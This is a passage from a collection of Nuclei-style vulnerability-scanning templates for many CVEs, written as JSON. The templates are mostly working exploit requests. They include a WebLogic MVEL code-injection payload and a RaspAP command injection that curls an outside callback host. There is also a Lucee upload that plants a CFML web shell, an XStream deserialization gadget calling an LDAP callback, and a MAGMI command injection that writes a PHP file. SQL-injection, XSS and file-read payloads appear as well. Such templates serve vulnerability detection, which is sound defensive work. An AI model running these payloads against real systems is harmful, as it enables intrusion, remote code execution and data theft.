/console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana 